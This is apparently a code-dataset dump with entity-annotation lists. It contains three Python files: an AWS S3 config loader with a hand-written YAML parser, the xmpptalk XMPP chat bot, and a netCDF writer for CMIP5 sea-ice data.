['URL', 'Validate.objects.fi'], ['URL', 'counts.ge'], ['URL', 'counts.ge'], ['URL', 'counts.ge'], ['URL', 'settings.VA'], ['URL', 'request.GET.ge'], ['URL', 'v.pr'], ['URL', 'v.pr'], ['URL', 'datetime.datetime.no'], ['URL', 'v.sa'], ['URL', 'prioritize.ht'], ['URL', 'request.GET.ge'], ['URL', 'v.pr'], ['URL', 'v.pr'], ['URL', 'datetime.datetime.no'], ['URL', 'v.sa'], ['URL', 'validate.ht'], ['URL', 'Site.objects.ge'], ['URL', 'request.GET.ge'], ['URL', 'Validate.objects.ge'], ['URL', 'v.pr'], ['URL', 'v.pr'], ['URL', 'datetime.datetime.no'], ['URL', 'v.sa'], ['URL', 'v.pr'], ['URL', 'v.pr'], ['URL', 'v.id'], ['URL', 'etree.Su'], ['URL', 'validateObject.id'], ['URL', 'etree.Su'], ['URL', 'validateObject.la'], ['URL', 'verified.is'], ['URL', 'etree.Su'], ['URL', 'validateObject.la'], ['URL', 'etree.Su'], ['URL', 'validateObject.pr'], ['URL', 'date.is'], ['URL', 'etree.Su'], ['URL', 'validateObject.pr'], ['URL', 'etree.Su'], ['URL', 'validateObject.se'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', 'parser.pa'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', 'parser.pa'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', 'validate.la'], ['URL', 'validate.la'], 
['URL', 'datetime.datetime.no'], ['URL', 'validate.pr'], ['URL', 'validate.sa'], ['URL', 'request.me'], ['URL', 'request.bo'], ['URL', 'validateObject.sa'], ['URL', 'request.ME'], ['URL', 'validateObject.id'], ['URL', 'validateObject.id'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'request.ME'], ['URL', 'validateObject.id'], ['URL', 'request.me'], ['URL', 'resp.st'], ['URL', 'request.me'], ['URL', 'Validate.objects.al'], ['URL', 'request.GE'], ['URL', 'request.GET.ge'], ['URL', 'request.pa'], ['URL', 'request.META.ge'], ['URL', 'AUTHOR.ge'], ['URL', 'AUTHOR.ge'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'request.me'], ['URL', 'request.bo'], ['URL', 'request.ME'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'request.me'], ['URL', 'Validate.objects.ge'], ['URL', 'Validate.Do'], ['URL', 'request.ME'], ['URL', 'AUTHOR.ge'], ['URL', 'AUTHOR.ge'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'request.me'], ['URL', 'Validate.objects.ge'], ['URL', 'object.de'], ['URL', 'request.ME'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'Validate.objects.la'], ['URL', 'list.ht'], ['URL', 'self.request.GET.ge'], ['URL', 'queryset.fi']] |
28 | #!/usr/bin/env python2
# coding=utf-8
"""
Config Handler
"""
__author__ = "Manuel Ebert"
__copyright__ = "Copyright 2015, summer.ai"
__date__ = "2015-11-09"
__email__ = "dummy@email.com"
import boto3
import os
from util import AttrDict
path = os.path.dirname(os.path.abspath(__file__))
def load_yaml(filename):
"""
This is a shitty YAML parser. If we were grown ups, we'd use PyYaml of course.
But since PyYaml refuses to run on AWS Lambda, we'll do this instead.
Args:
filename - filename to load
Returns:
dict
"""
def parse_value(value):
if "#" in value:
value = value[:value.index("#")]
value = value.strip(" \n")
if not value:
return None
if value.lower() == "true":
return True
if value.lower() == "false":
return False
try:
return int(value)
except:
try:
return float(value)
except:
return value
result = {}
current_key = None
with open(filename) as f:
for line in f.readlines():
if ":" in line:
key, value = line.split(":", 1)
key = key.strip()
current_key = key
result[key] = parse_value(value)
elif line.strip().startswith("-"):
value = line.strip(" -\n")
if not isinstance(result[current_key], list):
result[current_key] = [parse_value(value)]
else:
result[current_key].append(parse_value(value))
return result
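# Illustrative sketch of what load_yaml() above accepts (the sample keys
# below are hypothetical, not taken from the real config files):
#
#     region: us-east-1      # trailing comments are stripped
#     debug: true            # becomes the boolean True
#     retries: 3             # becomes an int
#     buckets:               # "-" items under a key become a list
#       - words
#       - cache
#
# load_yaml() on such a file would return roughly:
#     {'region': 'us-east-1', 'debug': True, 'retries': 3,
#      'buckets': ['words', 'cache']}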
def abs_path(filename):
return os.path.join(path, "config", "{}.yaml".format(filename))
def load_config(config):
keys = load_yaml(abs_path("default"))
keys['credentials'] = {}
if os.path.exists(abs_path("credentials")):
keys['credentials'] = load_yaml(abs_path("credentials"))
if config != 'default':
keys.update(load_yaml(abs_path(config)))
if "aws_access_key" in keys['credentials']:
keys['s3'] = boto3.resource(
's3', region_name=keys['region'],
aws_access_key_id=keys['credentials']['aws_access_key'],
aws_secret_access_key=keys['credentials']['aws_access_secret']
)
keys['s3_client'] = boto3.client(
's3', region_name=keys['region'],
aws_access_key_id=keys['credentials']['aws_access_key'],
aws_secret_access_key=keys['credentials']['aws_access_secret']
)
else:
keys['s3'] = boto3.resource('s3', region_name=keys['region'])
keys['s3_client'] = boto3.client('s3', region_name=keys['region'])
return AttrDict(keys)
config = load_config(os.environ.get('WORDNIK_CONFIG', 'default'))
def update_config(config_name):
global config
config.__data.update(load_yaml(abs_path(config_name)))
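# Hedged usage sketch: attribute-style access assumes AttrDict exposes
# dict keys as attributes (as it is used elsewhere in this project); the
# 'region' key is whatever config/default.yaml happens to define.
#
#     from config import config, update_config
#     config.region              # e.g. 'us-east-1'
#     update_config('test')      # overlay config/test.yaml on top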
| 2,919 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015-11-09'], ['PERSON', 'Manuel Ebert'], ['DATE_TIME', '2015'], ['PERSON', 'Args'], ['URL', 'summer.ai'], ['URL', 'email.com'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'value.in'], ['URL', 'value.st'], ['URL', 'f.re'], ['URL', 'key.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'boto3.re'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'boto3.cl'], ['URL', 'os.environ.ge']] |
29 | #!/usr/bin/env python3
# vim:fileencoding=utf-8
#
# (C) Copyright 2012 lilydjwg dummy@email.com
#
# This file is part of xmpptalk.
#
# xmpptalk is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# xmpptalk is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with xmpptalk. If not, see <http://www.gnu.org/licenses/>.
#
import sys
import os
import logging
import datetime
import base64
import hashlib
from collections import defaultdict
from functools import partial
from xml.etree import ElementTree as ET
import pyxmpp2.exceptions
from pyxmpp2.jid import JID
from pyxmpp2.message import Message
from pyxmpp2.presence import Presence
from pyxmpp2.client import Client
from pyxmpp2.settings import XMPPSettings
from pyxmpp2.roster import RosterReceivedEvent
from pyxmpp2.interfaces import EventHandler, event_handler, QUIT, NO_CHANGE
from pyxmpp2.streamevents import AuthorizedEvent, DisconnectedEvent
from pyxmpp2.interfaces import XMPPFeatureHandler
from pyxmpp2.interfaces import presence_stanza_handler, message_stanza_handler
from pyxmpp2.ext.version import VersionProvider
from pyxmpp2.expdict import ExpiringDictionary
from pyxmpp2.iq import Iq
try:
from xmpp_receipt import ReceiptSender
except ImportError:
ReceiptSender = None
from misc import *
import config
import models
from models import ValidationError
from messages import MessageMixin
from user import UserMixin
if getattr(config, 'conn_lost_interval_minutes', False):
conn_lost_interval = datetime.timedelta(minutes=config.conn_lost_interval_minutes)
else:
conn_lost_interval = None
class ChatBot(MessageMixin, UserMixin, EventHandler, XMPPFeatureHandler):
got_roster = False
message_queue = None
receipt_sender = None
ignore = set()
def __init__(self, jid, settings, botsettings=None):
if 'software_name' not in settings:
settings['software_name'] = self.__class__.__name__
if 'software_version' not in settings:
settings['software_version'] = __version__
version_provider = VersionProvider(settings)
handlers = []
if ReceiptSender:
self.receipt_sender = rs = ReceiptSender()
handlers.append(rs)
handlers.extend([self, version_provider])
self.client = Client(jid, handlers, settings)
self.presence = defaultdict(dict)
self.subscribes = ExpiringDictionary(default_timeout=5)
self.invited = {}
self.avatar_hash = None
self.settings = botsettings
def run(self):
self.client.connect()
self.jid = self.client.jid.bare()
logger.info('self jid: %r', self.jid)
self.update_on_setstatus = set()
if self.receipt_sender:
self.receipt_sender.stream = self.client.stream
self.client.run()
def disconnect(self):
    '''Request disconnection and let the main loop run for 2 more
    seconds for graceful disconnection.'''
self.client.disconnect()
while True:
try:
self.client.run(timeout = 2)
except pyxmpp2.exceptions.StreamParseError:
# we raise SystemExit to exit, expat says XML_ERROR_FINISHED
pass
else:
break
def handle_early_message(self):
self.got_roster = True
q = self.message_queue
if q:
self.now = datetime.datetime.utcnow()
for sender, stanza in q:
self.current_jid = sender
self._cached_jid = None
try:
timestamp = stanza.as_xml().find('{urn:xmpp:delay}delay').attrib['stamp']
except AttributeError:
timestamp = None
self.handle_message(stanza.body, timestamp)
self.message_queue = self.__class__.message_queue = None
@event_handler(RosterReceivedEvent)
def roster_received(self, stanze):
self.delayed_call(2, self.handle_early_message)
self.delayed_call(getattr(config, 'reconnect_timeout', 24 * 3600), self.signal_connect)
nick, avatar_type, avatar_file = (getattr(config, x, None) for x in ('nick', 'avatar_type', 'avatar_file'))
if nick or (avatar_type and avatar_file):
self.set_vcard(nick, (avatar_type, avatar_file))
return True
def signal_connect(self):
logging.info('Schedule to re-connecting...')
self.client.disconnect()
@message_stanza_handler()
def message_received(self, stanza):
if stanza.stanza_type != 'chat':
return True
if not stanza.body:
logging.info("%s message: %s", stanza.from_jid, stanza.serialize())
return True
sender = stanza.from_jid
body = stanza.body
self.current_jid = sender
self.now = datetime.datetime.utcnow()
logging.info('[%s] %s', sender, stanza.body)
if '@' not in str(sender.bare()):
logging.info('(server messages ignored)')
return True
if str(sender.bare()) in self.ignore:
logging.info('(The above message is ignored on purpose)')
return True
    if getattr(config, 'ban_russian', False):
if str(sender.bare()).endswith('.ru'):
logging.info('(Russian messager banned)')
return True
elif is_russian(body):
logging.info('(Russian message banned)')
return True
if not self.got_roster:
if not self.message_queue:
self.message_queue = []
self.message_queue.append((sender, stanza))
else:
self.handle_message(body)
logging.info('done with new message')
return True
def send_message(self, receiver, msg):
if isinstance(receiver, str):
receiver = JID(receiver)
m = Message(
stanza_type = 'chat',
from_jid = self.jid,
to_jid = receiver,
body = msg,
)
self.send(m)
def reply(self, msg):
self.send_message(self.current_jid, msg)
def send(self, stanza):
self.client.stream.send(stanza)
def delayed_call(self, seconds, func, *args, **kwargs):
self.client.main_loop.delayed_call(seconds, partial(func, *args, **kwargs))
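  # Usage sketch (hypothetical call, from within this class): schedule a
  # one-shot callback on pyxmpp2's main loop without blocking stanza
  # handling, e.g.
  #
  #   self.delayed_call(60, self.send_message, some_jid, 'still alive')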
@event_handler(DisconnectedEvent)
def handle_disconnected(self, event):
return QUIT
@property
def roster(self):
return self.client.roster
def get_online_users(self):
ret = [x.jid for x in self.roster if x.subscription == 'both' and \
str(x.jid) in self.presence]
logging.info('%d online buddies: %r', len(ret), ret)
return ret
def get_xmpp_status(self, jid):
return sorted(self.presence[str(jid)].values(), key=lambda x: x['priority'], reverse=True)[0]
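  # Illustrative shape of self.presence (filled in by
  # handle_presence_available below): keyed by bare JID, then by resource;
  # the sort above picks the entry with the highest XMPP priority.
  #
  #   self.presence['user@example.org'] = {
  #       'mobile':  {'show': 'away', 'status': '', 'priority': 0},
  #       'desktop': {'show': None, 'status': 'hi', 'priority': 50},
  #   }
  #   get_xmpp_status(jid)  ->  the 'desktop' entry (priority 50)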
def xmpp_setstatus(self, status, to_jid=None):
if isinstance(to_jid, str):
to_jid = JID(to_jid)
presence = Presence(status=status, to_jid=to_jid)
self.send(presence)
def update_roster(self, jid, name=NO_CHANGE, groups=NO_CHANGE):
self.client.roster_client.update_item(jid, name, groups)
def removeInvitation(self):
for ri in self.roster.values():
if ri.ask is not None:
self.client.roster_client.remove_item(ri.jid)
logging.info('%s removed', ri.jid)
def unsubscribe(self, jid, type='unsubscribe'):
presence = Presence(to_jid=jid, stanza_type=type)
self.send(presence)
def subscribe(self, jid):
self.invited[jid] = 2
presence = Presence(to_jid=jid, stanza_type='subscribe')
self.send(presence)
@presence_stanza_handler('subscribe')
def handle_presence_subscribe(self, stanza):
logging.info('%s subscribe', stanza.from_jid)
sender = stanza.from_jid
bare = sender.bare()
# avoid repeated request
invited = False
if bare not in self.subscribes:
invited = self.invited.get(bare, False)
if invited is not False:
if invited == 2:
self.invited[bare] = 1
else:
del self.invited[bare]
return stanza.make_accept_response()
      # We won't deny invited members
self.handle_userjoin_before()
else:
if config.private and str(bare) != config.root:
self.send_message(sender, _('Sorry, this is a private group, and you are not invited.'))
return stanza.make_deny_response()
if not self.handle_userjoin_before():
return stanza.make_deny_response()
self.current_jid = sender
self.now = datetime.datetime.utcnow()
try:
self.handle_userjoin(action=stanza.stanza_type)
except ValidationError:
#The server is subscribing
pass
self.subscribes[bare] = True
if stanza.stanza_type.endswith('ed'):
return stanza.make_accept_response()
if invited is False:
presence = Presence(to_jid=stanza.from_jid.bare(),
stanza_type='subscribe')
return [stanza.make_accept_response(), presence]
@presence_stanza_handler('subscribed')
def handle_presence_subscribed(self, stanza):
# use the same function
logging.info('%s subscribed', stanza.from_jid)
return self.handle_presence_subscribe(stanza)
@presence_stanza_handler('unsubscribe')
def handle_presence_unsubscribe(self, stanza):
logging.info('%s unsubscribe', stanza.from_jid)
sender = stanza.from_jid
self.current_jid = sender
self.now = datetime.datetime.utcnow()
self.handle_userleave(action=stanza.stanza_type)
if stanza.stanza_type.endswith('ed'):
return stanza.make_accept_response()
presence = Presence(to_jid=stanza.from_jid.bare(),
stanza_type='unsubscribe')
return [stanza.make_accept_response(), presence]
@presence_stanza_handler('unsubscribed')
def handle_presence_unsubscribed(self, stanza):
# use the same function
logging.info('%s unsubscribed', stanza.from_jid)
return self.handle_presence_unsubscribe(stanza)
@presence_stanza_handler()
def handle_presence_available(self, stanza):
if stanza.stanza_type not in ('available', None):
return False
jid = stanza.from_jid
plainjid = str(jid.bare())
if plainjid == str(self.jid):
return
self.now = datetime.datetime.utcnow()
if plainjid not in self.presence:
type = 'new'
self.current_jid = jid
self.user_update_presence(plainjid)
if conn_lost_interval and self.current_user and self.current_user.last_seen and \
self.now - self.current_user.last_seen < conn_lost_interval:
type = 'reconnect'
self.send_lost_message()
logging.info('%s[%s] (%s)', jid, stanza.show or 'available', type)
if self.roster and jid.bare() not in self.roster:
presence = Presence(to_jid=jid.bare(), stanza_type='subscribe')
self.send(presence)
presence = Presence(to_jid=jid.bare(), stanza_type='subscribed')
self.send(presence)
else:
if jid.resource not in self.presence[plainjid]:
self.user_update_presence(plainjid)
logging.info('%s[%s]', jid, stanza.show or 'available')
self.presence[plainjid][jid.resource] = {
'show': stanza.show,
'status': stanza.status,
'priority': stanza.priority,
}
if self.get_user_by_jid(plainjid) is None:
try:
self.current_jid = jid
self.handle_userjoin()
except ValidationError:
#The server is subscribing
pass
if config.warnv105 and jid.resource and \
jid.resource.startswith('Talk.') and not jid.resource.startswith('Talk.v104'):
# Got a Talk.v107...
# No need to translate; GTalk only has a v105 for Chinese.
      # (The Chinese message warns: you may be running the unencrypted
      # GTalk v105; others on the network could intercept your messages.
      # Please use the English GTalk v104 or another XMPP client.)
      self.send_message(jid, '警告:你正在使用的可能是不加密的 GTalk v105 版本。网络上的其它人可能会截获您的消息。这样不安全!请使用 GTalk v104 英文版或者其它 XMPP 客户端。\nGTalk 英文版: http://www.google.com/talk/index.html\nPidgin: http://www.pidgin.im/')
return True
@presence_stanza_handler('unavailable')
def handle_presence_unavailable(self, stanza):
jid = stanza.from_jid
plainjid = str(jid.bare())
if plainjid in self.presence and plainjid != str(self.jid):
try:
del self.presence[plainjid][jid.resource]
except KeyError:
pass
if self.presence[plainjid]:
logging.info('%s[unavailable] (partly)', jid)
else:
del self.presence[plainjid]
self.now = datetime.datetime.utcnow()
self.user_disappeared(plainjid)
logging.info('%s[unavailable] (totally)', jid)
return True
@event_handler()
def handle_all(self, event):
'''Log all events.'''
logging.info('-- {0}'.format(event))
def get_name(self, jid):
if isinstance(jid, str):
jid = JID(jid)
else:
jid = jid.bare()
try:
return self.roster[jid].name or hashjid(jid)
except KeyError:
return hashjid(jid)
def get_vcard(self, jid=None, callback=None):
'''callback is used as both result handler and error handler'''
q = Iq(
to_jid = jid and jid.bare(),
stanza_type = 'get',
)
vc = ET.Element("{vcard-temp}vCard")
q.add_payload(vc)
if callback:
self.stanza_processor.set_response_handlers(q, callback, callback)
self.send(q)
def set_vcard(self, nick=None, avatar=None):
self.get_vcard(callback=partial(self._set_vcard, nick, avatar))
def _set_vcard(self, nick=None, avatar=None, stanza=None):
#FIXME: This doesn't seem to work with jabber.org
q = Iq(
from_jid = self.jid,
stanza_type = 'set',
)
vc = ET.Element("{vcard-temp}vCard")
if nick is not None:
n = ET.SubElement(vc, '{vcard-temp}FN')
n.text = nick
if avatar is not None:
type, picfile = avatar
photo = ET.SubElement(vc, '{vcard-temp}PHOTO')
t = ET.SubElement(photo, '{vcard-temp}TYPE')
t.text = type
d = ET.SubElement(photo, '{vcard-temp}BINVAL')
data = open(picfile, 'rb').read()
d.text = base64.b64encode(data).decode('ascii')
self.avatar_hash = hashlib.new('sha1', data).hexdigest()
q.add_payload(vc)
self.stanza_processor.set_response_handlers(
q, self._set_vcard_callback, self._set_vcard_callback)
self.send(q)
def _set_vcard_callback(self, stanza):
if stanza.stanza_type == 'error':
logging.error('failed to set my vCard.')
else:
logging.info('my vCard set.')
self.update_presence()
def update_presence(self):
#TODO: update for individual users
presence = self.settings['presence']
x = ET.Element('{vcard-temp:x:update}x')
if self.avatar_hash:
photo = ET.SubElement(x, '{vcard-temp:x:update}photo')
photo.text = self.avatar_hash
presence.add_payload(x)
self.send(presence)
def runit(settings, mysettings):
bot = ChatBot(JID(config.jid), settings, mysettings)
try:
bot.run()
# Connection resets
raise Exception
except SystemExit as e:
if e.code == CMD_RESTART:
# restart
bot.disconnect()
models.connection.disconnect()
try:
os.close(lock_fd[0])
except:
pass
logging.info('restart...')
os.execv(sys.executable, [sys.executable] + sys.argv)
except KeyboardInterrupt:
pass
finally:
ChatBot.message_queue = bot.message_queue
bot.disconnect()
def main():
gp = models.connection.Group.one()
if gp and gp.status:
st = gp.status
else:
st = None
settings = dict(
# deliver here even if the admin logs in
initial_presence = Presence(priority=30, status=st),
poll_interval = 3,
)
botsettings = {
'presence': settings['initial_presence'],
}
settings.update(config.settings)
settings = XMPPSettings(settings)
if config.trace:
logging.info('enabling trace')
for logger in ('pyxmpp2.IN', 'pyxmpp2.OUT'):
logger = logging.getLogger(logger)
logger.setLevel(logging.DEBUG)
for logger in (
'pyxmpp2.mainloop.base', 'pyxmpp2.expdict',
'pyxmpp2.mainloop.poll', 'pyxmpp2.mainloop.events',
'pyxmpp2.transport', 'pyxmpp2.mainloop.events',
):
logger = logging.getLogger(logger)
logger.setLevel(max((logging.INFO, config.logging_level)))
if config.logging_level > logging.DEBUG:
restart_if_failed(runit, 3, args=(settings, botsettings))
else:
runit(settings, botsettings)
if __name__ == '__main__':
setup_logging()
models.init()
main()
| 16,313 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2012'], ['PERSON', 'lilydjwg'], ['LOCATION', 'xmpptalk'], ['PERSON', 'Iq'], ['PERSON', 'self.presence = defaultdict(dict'], ['DATE_TIME', '2 more\n seconds'], ['LOCATION', 'nick'], ['NRP', 'avatar_type'], ['NRP', 'avatar_type'], ['PERSON', 'stanza.body'], ['PERSON', "logging.info('(server"], ['DATE_TIME', 'seconds'], ['LOCATION', 'ri'], ['LOCATION', 'del self.invited[bare'], ['PERSON', 'str(bare'], ['PERSON', 'plainjid = str(jid.bare'], ['PERSON', 'stanza.show'], ['PERSON', 'jid.resource'], ['PERSON', 'stanza.show'], ['PERSON', 'jid.resource'], ['NRP', 'Chinese'], ['PERSON', '版本。网络上的其它人可能会截获您的消息。这样不安全!请使用 GTalk'], ['PERSON', 'plainjid = str(jid.bare'], ['LOCATION', 'del self.presence[plainjid][jid.resource'], ['PERSON', 'jid = JID(jid'], ['LOCATION', 'nick'], ['LOCATION', 'self._set_vcard_callback'], ['PERSON', "settings['initial_presence"], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'http://www.google.com/talk/index.html\\nPidgin:'], ['URL', "http://www.pidgin.im/'"], ['URL', 'email.com'], ['URL', 'xml.et'], ['URL', 'pyxmpp2.me'], ['URL', 'pyxmpp2.pr'], ['URL', 'pyxmpp2.cl'], ['URL', 'pyxmpp2.se'], ['URL', 'pyxmpp2.ro'], ['URL', 'pyxmpp2.int'], ['URL', 'pyxmpp2.st'], ['URL', 'pyxmpp2.int'], ['URL', 'pyxmpp2.int'], ['URL', 'pyxmpp2.ext.ve'], ['URL', 'pyxmpp2.iq'], ['URL', 'config.co'], ['URL', 'self.re'], ['URL', 'self.cl'], ['URL', 'self.pr'], ['URL', 'self.su'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'self.client.co'], ['URL', 'self.client.jid.ba'], ['URL', 'logger.in'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'sender.st'], ['URL', 'self.client.st'], ['URL', 'self.client.ru'], ['URL', 'self.cl'], ['URL', 'self.client.ru'], ['URL', 'pyxmpp2.exceptions.St'], ['URL', 'self.me'], ['URL', 'self.no'], ['URL', 'self.cu'], ['URL', 'stanza.as'], ['URL', 'stanza.bo'], ['URL', 'self.me'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.si'], ['URL', 'self.se'], ['URL', 'logging.in'], ['URL', 'self.cl'], ['URL', 'stanza.st'], ['URL', 'stanza.bo'], ['URL', 'logging.in'], ['URL', 'stanza.fr'], ['URL', 'stanza.se'], ['URL', 'stanza.fr'], ['URL', 'stanza.bo'], ['URL', 'self.cu'], ['URL', 'self.no'], ['URL', 'logging.in'], ['URL', 'stanza.bo'], ['URL', 'sender.ba'], ['URL', 'logging.in'], ['URL', 'sender.ba'], ['URL', 'logging.in'], ['URL', 'sender.ba'], ['URL', 'logging.in'], ['URL', 'logging.in'], ['URL', 'self.me'], ['URL', 'self.me'], ['URL', 'self.me'], ['URL', 'logging.in'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.cu'], ['URL', 'self.client.stream.se'], ['URL', 'self.client.ma'], ['URL', 'loop.de'], ['URL', 'self.client.ro'], ['URL', 'self.ro'], ['URL', 'x.su'], ['URL', 'self.pr'], ['URL', 'logging.in'], ['URL', 'self.pr'], ['URL', 'self.se'], ['URL', 'self.client.ro'], ['URL', 'self.roster.va'], ['URL', 'ri.as'], ['URL', 'self.client.ro'], ['URL', 'client.re'], ['URL', 'logging.in'], ['URL', 'self.se'], ['URL', 'self.in'], ['URL', 'self.se'], ['URL', 'logging.in'], ['URL', 'stanza.fr'], ['URL', 'stanza.fr'], ['URL', 'sender.ba'], ['URL', 'self.su'], ['URL', 'self.invited.ge'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'stanza.ma'], ['URL', 'config.pr'], ['URL', 'config.ro'], ['URL', 'self.se'], ['URL', 'stanza.ma'], ['URL', 'stanza.ma'], ['URL', 'self.cu'], ['URL', 'self.no'], ['URL', 'stanza.st'], ['URL', 'self.su'], ['URL', 'stanza.st'], ['URL', 'stanza.ma'], ['URL', 'stanza.fr'], ['URL', 'jid.ba'], ['URL', 'stanza.ma'], ['URL', 'logging.in'], ['URL', 'stanza.fr'], ['URL', 
'logging.in'], ['URL', 'stanza.fr'], ['URL', 'stanza.fr'], ['URL', 'self.cu'], ['URL', 'self.no'], ['URL', 'stanza.st'], ['URL', 'stanza.st'], ['URL', 'stanza.ma'], ['URL', 'stanza.fr'], ['URL', 'jid.ba'], ['URL', 'stanza.ma'], ['URL', 'logging.in'], ['URL', 'stanza.fr'], ['URL', 'stanza.st'], ['URL', 'stanza.fr'], ['URL', 'jid.ba'], ['URL', 'self.no'], ['URL', 'self.pr'], ['URL', 'self.cu'], ['URL', 'self.us'], ['URL', 'self.cu'], ['URL', 'self.cu'], ['URL', 'user.la'], ['URL', 'self.no'], ['URL', 'self.cu'], ['URL', 'user.la'], ['URL', 'self.se'], ['URL', 'logging.in'], ['URL', 'stanza.sh'], ['URL', 'self.ro'], ['URL', 'jid.ba'], ['URL', 'self.ro'], ['URL', 'jid.ba'], ['URL', 'self.se'], ['URL', 'jid.ba'], ['URL', 'self.se'], ['URL', 'jid.re'], ['URL', 'self.pr'], ['URL', 'self.us'], ['URL', 'logging.in'], ['URL', 'stanza.sh'], ['URL', 'self.pr'], ['URL', 'jid.re'], ['URL', 'stanza.sh'], ['URL', 'stanza.st'], ['URL', 'stanza.pr'], ['URL', 'self.ge'], ['URL', 'self.cu'], ['URL', 'jid.re'], ['URL', 'jid.resource.st'], ['URL', 'jid.resource.st'], ['URL', 'self.se'], ['URL', 'stanza.fr'], ['URL', 'jid.ba'], ['URL', 'self.pr'], ['URL', 'self.pr'], ['URL', 'jid.re'], ['URL', 'self.pr'], ['URL', 'logging.in'], ['URL', 'self.pr'], ['URL', 'self.no'], ['URL', 'self.us'], ['URL', 'logging.in'], ['URL', 'logging.in'], ['URL', 'jid.ba'], ['URL', 'self.ro'], ['URL', 'jid.ba'], ['URL', 'q.ad'], ['URL', 'self.st'], ['URL', 'processor.se'], ['URL', 'self.se'], ['URL', 'self.ge'], ['URL', 'jabber.org'], ['URL', 'ET.Su'], ['URL', 'ET.Su'], ['URL', 'ET.Su'], ['URL', 'ET.Su'], ['URL', 'hashlib.ne'], ['URL', 'q.ad'], ['URL', 'self.st'], ['URL', 'processor.se'], ['URL', 'self.se'], ['URL', 'stanza.st'], ['URL', 'logging.er'], ['URL', 'logging.in'], ['URL', 'self.se'], ['URL', 'ET.Su'], ['URL', 'presence.ad'], ['URL', 'self.se'], ['URL', 'bot.ru'], ['URL', 'e.co'], ['URL', 'models.co'], ['URL', 'os.cl'], ['URL', 'logging.in'], ['URL', 'sys.ar'], ['URL', 'ChatBot.me'], ['URL', 'bot.me'], ['URL', 'models.connection.Gr'], ['URL', 'gp.st'], ['URL', 'gp.st'], ['URL', 'config.se'], ['URL', 'config.tr'], ['URL', 'logging.in'], ['URL', 'pyxmpp2.IN'], ['URL', 'logging.ge'], ['URL', 'logger.se'], ['URL', 'logging.DE'], ['URL', 'pyxmpp2.mainloop.ba'], ['URL', 'pyxmpp2.ma'], ['URL', 'pyxmpp2.ma'], ['URL', 'pyxmpp2.tr'], ['URL', 'pyxmpp2.ma'], ['URL', 'logging.ge'], ['URL', 'logger.se'], ['URL', 'logging.IN'], ['URL', 'logging.DE'], ['URL', 'models.in']] |
30 | from datetime import datetime, timedelta
from netCDF4 import Dataset
from netCDF4 import num2date
import numpy as np
import time
import os
__author__ = 'Trond Kristiansen'
__email__ = 'dummy@email.com'
__created__ = datetime(2014, 1, 23)
__modified__ = datetime(2014, 1, 23)
__version__ = "0.1"
__status__ = "Development"
def help():
    """
    This function generates a netCDF4 file and saves the running average
    values for specific years into a file for each IPCC AR5 model.
    Used together with extractIce.py
    """
def writeCMIP5File(modelName,scenario,myvarname,lon,lat,time,mydata,mydataanomaly,outfilename):
myformat='NETCDF3_CLASSIC'
if os.path.exists(outfilename):
os.remove(outfilename)
print "Results written to netcdf file: %s"%(outfilename)
if myvarname=="sic": myvar="SIC"
f1 = Dataset(outfilename, mode='w', format=myformat)
f1.title = "IPCC AR5 %s"%(myvar)
f1.description = "IPCC AR5 running averages of %s for model %s for scenario %s"%(myvar,modelName,scenario)
f1.history = "Created " + str(datetime.now())
f1.source = "Trond Kristiansen (dummy@email.com)"
f1.type = "File in NetCDF3 format created using iceExtract.py"
f1.Conventions = "CF-1.0"
"""Define dimensions"""
f1.createDimension('x', len(lon))
f1.createDimension('y', len(lat))
f1.createDimension('time', None)
vnc = f1.createVariable('longitude', 'd', ('x',),zlib=False)
vnc.long_name = 'Longitude'
vnc.units = 'degree_east'
vnc.standard_name = 'longitude'
vnc[:] = lon
vnc = f1.createVariable('latitude', 'd', ('y',),zlib=False)
vnc.long_name = 'Latitude'
vnc.units = 'degree_north'
vnc.standard_name = 'latitude'
vnc[:] = lat
v_time = f1.createVariable('time', 'd', ('time',),zlib=False)
v_time.long_name = 'Years'
v_time.units = 'Years'
v_time.field = 'time, scalar, series'
v_time[:]=time
v_temp=f1.createVariable('SIC', 'd', ('time', 'y', 'x',),zlib=False)
v_temp.long_name = "Sea-ice area fraction (%)"
v_temp.units = "%"
v_temp.time = "time"
v_temp.field="SIC, scalar, series"
v_temp.missing_value = 1e20
if myvarname=='sic':
f1.variables['SIC'][:,:,:] = mydata
f1.close()
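# Hedged example call (names and shapes are illustrative, not from the
# original workflow): a 2x2 grid with a single yearly time step.
if __name__ == '__main__':
    lons = np.array([0.0, 1.0])
    lats = np.array([60.0, 61.0])
    years = np.array([2014.0])
    sic = np.zeros((1, 2, 2))     # (time, y, x), percent sea-ice cover
    writeCMIP5File('MPI-ESM-LR', 'rcp85', 'sic',
                   lons, lats, years, sic, None, 'test_sic.nc')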
